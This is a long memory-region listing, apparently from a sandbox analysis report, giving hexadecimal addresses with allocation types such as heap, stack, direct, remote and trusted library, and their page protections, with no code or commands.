|
trusted library allocation
|
page execute and read and write
|
||
|
235CD000
|
stack
|
page read and write
|
||
|
21087000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
82DF000
|
heap
|
page read and write
|
||
|
57A0000
|
direct allocation
|
page read and write
|
||
|
7301000
|
heap
|
page read and write
|
||
|
2480000
|
trusted library allocation
|
page read and write
|
||
|
769D000
|
stack
|
page read and write
|
||
|
20C10000
|
remote allocation
|
page read and write
|
||
|
9100000
|
direct allocation
|
page execute and read and write
|
||
|
54BA000
|
heap
|
page read and write
|
||
|
5305000
|
heap
|
page read and write
|
||
|
FA36F3F000
|
stack
|
page read and write
|
||
|
237CC000
|
stack
|
page read and write
|
||
|
210DC000
|
trusted library allocation
|
page read and write
|
||
|
2C9E000
|
stack
|
page read and write
|
||
|
4B00000
|
direct allocation
|
page read and write
|
||
|
27AD7900000
|
heap
|
page read and write
|
||
|
429E000
|
remote allocation
|
page execute and read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
2101B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
direct allocation
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
27ADAE1C000
|
trusted library allocation
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
27AD97C0000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
20A90000
|
trusted library allocation
|
page read and write
|
||
|
57C0000
|
direct allocation
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
27AD7AF0000
|
trusted library allocation
|
page read and write
|
||
|
829C000
|
heap
|
page read and write
|
||
|
20F97000
|
trusted library allocation
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
4D01000
|
trusted library allocation
|
page read and write
|
||
|
2DE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
20CFB000
|
trusted library allocation
|
page read and write
|
||
|
21047000
|
trusted library allocation
|
page read and write
|
||
|
FA37B8B000
|
stack
|
page read and write
|
||
|
27AF1B6C000
|
heap
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
27AD7B40000
|
trusted library allocation
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
21068000
|
trusted library allocation
|
page read and write
|
||
|
27ADB598000
|
trusted library allocation
|
page read and write
|
||
|
5741000
|
trusted library allocation
|
page read and write
|
||
|
FA36E3E000
|
stack
|
page read and write
|
||
|
210B5000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
27ADB7F7000
|
trusted library allocation
|
page read and write
|
||
|
27AD7960000
|
heap
|
page read and write
|
||
|
20F40000
|
heap
|
page read and write
|
||
|
20E18000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
2109C000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
210BF000
|
trusted library allocation
|
page read and write
|
||
|
4B40000
|
direct allocation
|
page read and write
|
||
|
24AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
540C000
|
heap
|
page read and write
|
||
|
2109A000
|
trusted library allocation
|
page read and write
|
||
|
27ADA05E000
|
trusted library allocation
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
23100000
|
heap
|
page execute and read and write
|
||
|
2EED000
|
heap
|
page read and write
|
||
|
27ADB7B1000
|
trusted library allocation
|
page read and write
|
||
|
2110E000
|
trusted library allocation
|
page read and write
|
||
|
7527000
|
trusted library allocation
|
page read and write
|
||
|
9C3E000
|
direct allocation
|
page execute and read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
20A1E000
|
stack
|
page read and write
|
||
|
209DC000
|
stack
|
page read and write
|
||
|
82B9000
|
heap
|
page read and write
|
||
|
21112000
|
trusted library allocation
|
page read and write
|
||
|
27AD9E8E000
|
trusted library allocation
|
page read and write
|
||
|
20FA4000
|
trusted library allocation
|
page read and write
|
||
|
27AF1C39000
|
heap
|
page read and write
|
||
|
258A9090000
|
heap
|
page read and write
|
||
|
2F7F000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
2102E000
|
trusted library allocation
|
page read and write
|
||
|
20510000
|
direct allocation
|
page read and write
|
||
|
21151000
|
trusted library allocation
|
page read and write
|
||
|
8294000
|
heap
|
page read and write
|
||
|
27ADB615000
|
trusted library allocation
|
page read and write
|
||
|
27AD9C64000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
trusted library allocation
|
page read and write
|
||
|
27AD7BA7000
|
heap
|
page execute and read and write
|
||
|
547C000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
495E000
|
stack
|
page read and write
|
||
|
2F85000
|
heap
|
page read and write
|
||
|
27AD7BB0000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
547C000
|
heap
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
20C8F000
|
stack
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2484000
|
trusted library allocation
|
page read and write
|
||
|
7409000
|
heap
|
page read and write
|
||
|
210D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
27AD7A7B000
|
heap
|
page read and write
|
||
|
27AD9C51000
|
trusted library allocation
|
page read and write
|
||
|
21056000
|
trusted library allocation
|
page read and write
|
||
|
2E3A000
|
heap
|
page read and write
|
||
|
2115D000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2368E000
|
stack
|
page read and write
|
||
|
21170000
|
trusted library allocation
|
page read and write
|
||
|
FA3798F000
|
stack
|
page read and write
|
||
|
745E000
|
heap
|
page read and write
|
||
|
389E000
|
remote allocation
|
page execute and read and write
|
||
|
8210000
|
heap
|
page read and write
|
||
|
4E5D000
|
trusted library allocation
|
page read and write
|
||
|
75AE000
|
stack
|
page read and write
|
||
|
82A5000
|
heap
|
page read and write
|
||
|
20FB7000
|
trusted library allocation
|
page read and write
|
||
|
21199000
|
trusted library allocation
|
page read and write
|
||
|
547E000
|
heap
|
page read and write
|
||
|
2DE2000
|
trusted library allocation
|
page read and write
|
||
|
2EC8000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
27ADA065000
|
trusted library allocation
|
page read and write
|
||
|
210DA000
|
trusted library allocation
|
page read and write
|
||
|
2D09000
|
heap
|
page read and write
|
||
|
21081000
|
trusted library allocation
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
21064000
|
trusted library allocation
|
page read and write
|
||
|
20ADE000
|
stack
|
page read and write
|
||
|
20F00000
|
heap
|
page execute and read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
2BFE000
|
unkown
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
20CE0000
|
trusted library allocation
|
page read and write
|
||
|
210D8000
|
trusted library allocation
|
page read and write
|
||
|
2394D000
|
stack
|
page read and write
|
||
|
FA36CB9000
|
stack
|
page read and write
|
||
|
5390000
|
heap
|
page readonly
|
||
|
2A8C000
|
stack
|
page read and write
|
||
|
2360E000
|
stack
|
page read and write
|
||
|
258A909B000
|
heap
|
page read and write
|
||
|
27AD7A4D000
|
heap
|
page read and write
|
||
|
210F9000
|
trusted library allocation
|
page read and write
|
||
|
5430000
|
heap
|
page read and write
|
||
|
5437000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AC5000
|
heap
|
page execute and read and write
|
||
|
24B0000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
24B2000
|
trusted library allocation
|
page read and write
|
||
|
21017000
|
trusted library allocation
|
page read and write
|
||
|
30CE000
|
unkown
|
page read and write
|
||
|
2110C000
|
trusted library allocation
|
page read and write
|
||
|
20CB0000
|
direct allocation
|
page read and write
|
||
|
234D0000
|
trusted library allocation
|
page read and write
|
||
|
20520000
|
direct allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
210FB000
|
trusted library allocation
|
page read and write
|
||
|
20B1F000
|
stack
|
page read and write
|
||
|
861C000
|
stack
|
page read and write
|
||
|
21157000
|
trusted library allocation
|
page read and write
|
||
|
4B60000
|
direct allocation
|
page read and write
|
||
|
20CF6000
|
trusted library allocation
|
page read and write
|
||
|
210B7000
|
trusted library allocation
|
page read and write
|
||
|
22FF9000
|
heap
|
page read and write
|
||
|
27AD9780000
|
heap
|
page execute and read and write
|
||
|
20B6D000
|
stack
|
page read and write
|
||
|
210F3000
|
trusted library allocation
|
page read and write
|
||
|
27AD9730000
|
trusted library allocation
|
page read and write
|
||
|
2F57000
|
heap
|
page read and write
|
||
|
210D6000
|
trusted library allocation
|
page read and write
|
||
|
27AF1BB3000
|
heap
|
page read and write
|
||
|
21110000
|
trusted library allocation
|
page read and write
|
||
|
8260000
|
heap
|
page read and write
|
||
|
754A000
|
trusted library allocation
|
page read and write
|
||
|
2104D000
|
trusted library allocation
|
page read and write
|
||
|
27AD7A81000
|
heap
|
page read and write
|
||
|
21015000
|
trusted library allocation
|
page read and write
|
||
|
8250000
|
heap
|
page read and write
|
||
|
20FB9000
|
trusted library allocation
|
page read and write
|
||
|
FA37B0A000
|
stack
|
page read and write
|
||
|
54BA000
|
heap
|
page read and write
|
||
|
20CE8000
|
trusted library allocation
|
page read and write
|
||
|
5473000
|
heap
|
page read and write
|
||
|
4CD8000
|
trusted library allocation
|
page read and write
|
||
|
27AF1BC7000
|
heap
|
page read and write
|
||
|
27AD7A74000
|
heap
|
page read and write
|
||
|
7F800000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F95000
|
trusted library allocation
|
page read and write
|
||
|
4AC0000
|
heap
|
page execute and read and write
|
||
|
53A0000
|
direct allocation
|
page read and write
|
||
|
5434000
|
heap
|
page read and write
|
||
|
20EF0000
|
trusted library allocation
|
page read and write
|
||
|
20FAD000
|
trusted library allocation
|
page read and write
|
||
|
27AD7C15000
|
heap
|
page read and write
|
||
|
2104F000
|
trusted library allocation
|
page read and write
|
||
|
20EF0000
|
trusted library allocation
|
page read and write
|
||
|
20F51000
|
trusted library allocation
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
20FBF000
|
trusted library allocation
|
page read and write
|
||
|
3760000
|
remote allocation
|
page execute and read and write
|
||
|
21F51000
|
trusted library allocation
|
page read and write
|
||
|
24B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
20FAB000
|
trusted library allocation
|
page read and write
|
||
|
20EEC000
|
stack
|
page read and write
|
||
|
541F000
|
heap
|
page read and write
|
||
|
2F22000
|
heap
|
page read and write
|
||
|
27AD9C8A000
|
trusted library allocation
|
page read and write
|
||
|
5471000
|
heap
|
page read and write
|
||
|
27AF1BC3000
|
heap
|
page read and write
|
||
|
20FE0000
|
trusted library allocation
|
page read and write
|
||
|
238CD000
|
stack
|
page read and write
|
||
|
20FC8000
|
trusted library allocation
|
page read and write
|
||
|
20D00000
|
heap
|
page read and write
|
||
|
27ADA00C000
|
trusted library allocation
|
page read and write
|
||
|
2E10000
|
heap
|
page readonly
|
||
|
258A92B0000
|
heap
|
page read and write
|
||
|
FA36AFD000
|
stack
|
page read and write
|
||
|
53E6000
|
trusted library allocation
|
page read and write
|
||
|
FA368BE000
|
stack
|
page read and write
|
||
|
FA36D38000
|
stack
|
page read and write
|
||
|
210FD000
|
trusted library allocation
|
page read and write
|
||
|
27AF1933000
|
heap
|
page read and write
|
||
|
FA367FD000
|
stack
|
page read and write
|
||
|
2106C000
|
trusted library allocation
|
page read and write
|
||
|
7450000
|
heap
|
page read and write
|
||
|
27AD9C60000
|
trusted library allocation
|
page read and write
|
||
|
231A8000
|
heap
|
page read and write
|
||
|
20FFC000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
27ADA075000
|
trusted library allocation
|
page read and write
|
||
|
2109E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
27ADB62A000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
21154000
|
trusted library allocation
|
page read and write
|
||
|
27AF1C26000
|
heap
|
page read and write
|
||
|
485E000
|
stack
|
page read and write
|
||
|
27AD78E0000
|
heap
|
page read and write
|
||
|
27AD7ABD000
|
heap
|
page read and write
|
||
|
6B54DFF000
|
stack
|
page read and write
|
||
|
2DB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
20CE0000
|
trusted library allocation
|
page read and write
|
||
|
20FCD000
|
trusted library allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
27AD7BA0000
|
heap
|
page execute and read and write
|
||
|
27AD79D0000
|
heap
|
page read and write
|
||
|
210DE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27ADAA82000
|
trusted library allocation
|
page read and write
|
||
|
20FDE000
|
trusted library allocation
|
page read and write
|
||
|
2101E000
|
trusted library allocation
|
page read and write
|
||
|
210A4000
|
trusted library allocation
|
page read and write
|
||
|
2314E000
|
heap
|
page read and write
|
||
|
74E0000
|
heap
|
page read and write
|
||
|
230E0000
|
trusted library allocation
|
page read and write
|
||
|
27AD79DD000
|
heap
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
27AD7AC3000
|
heap
|
page read and write
|
||
|
20FE8000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
heap
|
page read and write
|
||
|
2DB4000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
direct allocation
|
page read and write
|
||
|
4A6D000
|
stack
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
FA366FE000
|
stack
|
page read and write
|
||
|
27ADB5AB000
|
trusted library allocation
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
4BFA000
|
stack
|
page read and write
|
||
|
2100F000
|
trusted library allocation
|
page read and write
|
||
|
27AD99FD000
|
trusted library allocation
|
page read and write
|
||
|
24A0000
|
trusted library allocation
|
page read and write
|
||
|
5430000
|
heap
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
20D4C000
|
stack
|
page read and write
|
||
|
24A2000
|
trusted library allocation
|
page read and write
|
||
|
258A92B4000
|
heap
|
page read and write
|
||
|
27AF1939000
|
heap
|
page read and write
|
||
|
27ADA048000
|
trusted library allocation
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
4C3D000
|
stack
|
page read and write
|
||
|
4C9E000
|
remote allocation
|
page execute and read and write
|
||
|
4CC0000
|
heap
|
page execute and read and write
|
||
|
47BC000
|
stack
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
875D000
|
stack
|
page read and write
|
||
|
22F8E000
|
stack
|
page read and write
|
||
|
77AB000
|
stack
|
page read and write
|
||
|
27AF17D5000
|
heap
|
page read and write
|
||
|
21083000
|
trusted library allocation
|
page read and write
|
||
|
2370D000
|
stack
|
page read and write
|
||
|
20BAE000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2106A000
|
trusted library allocation
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page read and write
|
||
|
499E000
|
stack
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
5429000
|
heap
|
page read and write
|
||
|
4918000
|
heap
|
page read and write
|
||
|
20FBD000
|
trusted library allocation
|
page read and write
|
||
|
27AD7A7F000
|
heap
|
page read and write
|
||
|
FA369FE000
|
stack
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
210C4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
21114000
|
trusted library allocation
|
page read and write
|
||
|
2D90000
|
trusted library section
|
page read and write
|
||
|
20FFE000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
230F0000
|
trusted library allocation
|
page read and write
|
||
|
23151000
|
heap
|
page read and write
|
||
|
57B0000
|
direct allocation
|
page read and write
|
||
|
27ADB5A7000
|
trusted library allocation
|
page read and write
|
||
|
258A8F60000
|
heap
|
page read and write
|
||
|
230C5000
|
trusted library allocation
|
page read and write
|
||
|
5D6A000
|
trusted library allocation
|
page read and write
|
||
|
4C7B000
|
stack
|
page read and write
|
||
|
27AD9F5B000
|
trusted library allocation
|
page read and write
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
210A0000
|
trusted library allocation
|
page read and write
|
||
|
869C000
|
stack
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
230B9000
|
trusted library allocation
|
page read and write
|
||
|
5E90000
|
trusted library allocation
|
page read and write
|
||
|
23094000
|
trusted library allocation
|
page read and write
|
||
|
210A2000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
heap
|
page read and write
|
||
|
21036000
|
trusted library allocation
|
page read and write
|
||
|
210F7000
|
trusted library allocation
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
27AD9C75000
|
trusted library allocation
|
page read and write
|
||
|
20F86000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
85DC000
|
stack
|
page read and write
|
||
|
2ECB000
|
trusted library allocation
|
page read and write
|
||
|
27ADB619000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2306E000
|
heap
|
page read and write
|
||
|
20C4E000
|
stack
|
page read and write
|
||
|
2DBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20EF0000
|
trusted library allocation
|
page read and write
|
||
|
560F000
|
stack
|
page read and write
|
||
|
4D67000
|
trusted library allocation
|
page read and write
|
||
|
2364E000
|
stack
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
541F000
|
heap
|
page read and write
|
||
|
20FAF000
|
trusted library allocation
|
page read and write
|
||
|
21030000
|
trusted library allocation
|
page read and write
|
||
|
2106E000
|
trusted library allocation
|
page read and write
|
||
|
20C10000
|
remote allocation
|
page read and write
|
||
|
21072000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
84C5000
|
trusted library allocation
|
page read and write
|
||
|
4B70000
|
direct allocation
|
page read and write
|
||
|
82A9000
|
heap
|
page read and write
|
||
|
8303000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page execute and read and write
|
||
|
54A6000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
20FCB000
|
trusted library allocation
|
page read and write
|
||
|
27AD97D1000
|
trusted library allocation
|
page read and write
|
||
|
27ADB725000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
27AE97E0000
|
trusted library allocation
|
page read and write
|
||
|
27AE9ACC000
|
trusted library allocation
|
page read and write
|
||
|
20530000
|
direct allocation
|
page read and write
|
||
|
4CD0000
|
trusted library allocation
|
page read and write
|
||
|
2104B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA36D3E000
|
stack
|
page read and write
|
||
|
21160000
|
trusted library allocation
|
page read and write
|
||
|
20FF5000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
2DDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
27AD9CCB000
|
trusted library allocation
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
55CE000
|
stack
|
page read and write
|
||
|
6B54CFF000
|
unkown
|
page read and write
|
||
|
27ADB5D7000
|
trusted library allocation
|
page read and write
|
||
|
2F81000
|
heap
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
21F57000
|
trusted library allocation
|
page read and write
|
||
|
20FE4000
|
trusted library allocation
|
page read and write
|
||
|
27AD9700000
|
trusted library allocation
|
page read and write
|
||
|
20F10000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DC9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
heap
|
page read and write
|
||
|
53C8000
|
heap
|
page read and write
|
||
|
2319C000
|
heap
|
page read and write
|
||
|
20E0E000
|
stack
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
81CE000
|
stack
|
page read and write
|
||
|
21197000
|
trusted library allocation
|
page read and write
|
||
|
27AD7955000
|
heap
|
page read and write
|
||
|
23150000
|
heap
|
page read and write
|
||
|
27AF1A71000
|
heap
|
page read and write
|
||
|
27AF1936000
|
heap
|
page read and write
|
||
|
4800000
|
trusted library allocation
|
page read and write
|
||
|
27AE97D1000
|
trusted library allocation
|
page read and write
|
||
|
A63E000
|
direct allocation
|
page execute and read and write
|
||
|
FA36B79000
|
stack
|
page read and write
|
||
|
24A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D89000
|
stack
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
23170000
|
heap
|
page read and write
|
||
|
20FC2000
|
trusted library allocation
|
page read and write
|
||
|
871E000
|
stack
|
page read and write
|
||
|
FA36675000
|
stack
|
page read and write
|
||
|
21070000
|
trusted library allocation
|
page read and write
|
||
|
32E7000
|
heap
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
236CC000
|
stack
|
page read and write
|
||
|
27AD9C5C000
|
trusted library allocation
|
page read and write
|
||
|
53C0000
|
heap
|
page read and write
|
||
|
20A5F000
|
stack
|
page read and write
|
||
|
27AF1C4C000
|
heap
|
page read and write
|
||
|
27AD7B30000
|
heap
|
page readonly
|
||
|
27AD7950000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
21034000
|
trusted library allocation
|
page read and write
|
||
|
2390E000
|
stack
|
page read and write
|
||
|
27ADB586000
|
trusted library allocation
|
page read and write
|
||
|
27ADB5A3000
|
trusted library allocation
|
page read and write
|
||
|
47FD000
|
stack
|
page read and write
|
||
|
FA36EBC000
|
stack
|
page read and write
|
||
|
21066000
|
trusted library allocation
|
page read and write
|
||
|
234E0000
|
trusted library allocation
|
page read and write
|
||
|
27ADAC30000
|
trusted library allocation
|
page read and write
|
||
|
4CBD000
|
stack
|
page read and write
|
||
|
27ADAC36000
|
trusted library allocation
|
page read and write
|
||
|
20FF9000
|
trusted library allocation
|
page read and write
|
||
|
21001000
|
trusted library allocation
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
21013000
|
trusted library allocation
|
page read and write
|
||
|
2091E000
|
stack
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
27AD7B20000
|
trusted library allocation
|
page read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
5437000
|
heap
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
8140000
|
trusted library allocation
|
page execute and read and write
|
||
|
27ADB097000
|
trusted library allocation
|
page read and write
|
||
|
20CE0000
|
trusted library allocation
|
page read and write
|
||
|
73F9000
|
heap
|
page read and write
|
||
|
FA37A8D000
|
stack
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
8770000
|
direct allocation
|
page read and write
|
||
|
20FA9000
|
trusted library allocation
|
page read and write
|
||
|
2470000
|
trusted library allocation
|
page read and write
|
||
|
210F1000
|
trusted library allocation
|
page read and write
|
||
|
540D000
|
heap
|
page read and write
|
||
|
2384C000
|
stack
|
page read and write
|
||
|
20FE2000
|
trusted library allocation
|
page read and write
|
||
|
23162000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
5401000
|
heap
|
page read and write
|
||
|
23171000
|
heap
|
page read and write
|
||
|
210BD000
|
trusted library allocation
|
page read and write
|
||
|
820E000
|
stack
|
page read and write
|
||
|
230B6000
|
trusted library allocation
|
page read and write
|
||
|
258A92B5000
|
heap
|
page read and write
|
||
|
27AD9C48000
|
trusted library allocation
|
page read and write
|
||
|
27AD985E000
|
trusted library allocation
|
page read and write
|
||
|
27AD7C10000
|
heap
|
page read and write
|
||
|
27AF1BC1000
|
heap
|
page read and write
|
||
|
2108B000
|
trusted library allocation
|
page read and write
|
||
|
27ADAC34000
|
trusted library allocation
|
page read and write
|
||
|
20F90000
|
trusted library allocation
|
page read and write
|
||
|
24C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20F30000
|
trusted library allocation
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
direct allocation
|
page read and write
|
||
|
2490000
|
trusted library allocation
|
page read and write
|
||
|
27AD7ABF000
|
heap
|
page read and write
|
||
|
21053000
|
trusted library allocation
|
page read and write
|
||
|
27AD9CC7000
|
trusted library allocation
|
page read and write
|
||
|
82B1000
|
heap
|
page read and write
|
||
|
27AF1C2F000
|
heap
|
page read and write
|
||
|
2483000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA3687E000
|
stack
|
page read and write
|
||
|
210D4000
|
trusted library allocation
|
page read and write
|
||
|
20FDC000
|
trusted library allocation
|
page read and write
|
||
|
20CF9000
|
trusted library allocation
|
page read and write
|
||
|
21049000
|
trusted library allocation
|
page read and write
|
||
|
73F0000
|
heap
|
page read and write
|
||
|
210EF000
|
trusted library allocation
|
page read and write
|
||
|
27AD7B50000
|
heap
|
page execute and read and write
|
||
|
23110000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
20540000
|
direct allocation
|
page read and write
|
||
|
20CD0000
|
trusted library allocation
|
page read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
5300000
|
heap
|
page read and write
|
||
|
7090000
|
heap
|
page read and write
|
||
|
FA3697E000
|
stack
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page read and write
|
||
|
27AF18E0000
|
heap
|
page read and write
|
||
|
540E000
|
heap
|
page read and write
|
||
|
208C0000
|
heap
|
page read and write
|
||
|
2099D000
|
stack
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
27AF1A50000
|
heap
|
page read and write
|
||
|
20C10000
|
remote allocation
|
page read and write
|
||
|
27AF192E000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
27AD7800000
|
heap
|
page read and write
|
||
|
2DC0000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
4AF0000
|
heap
|
page read and write
|
||
|
2095F000
|
stack
|
page read and write
|
||
|
2F53000
|
heap
|
page read and write
|
||
|
5D01000
|
trusted library allocation
|
page read and write
|
||
|
FA36FBB000
|
stack
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
707D000
|
stack
|
page read and write
|
||
|
20FE6000
|
trusted library allocation
|
page read and write
|
||
|
210F5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
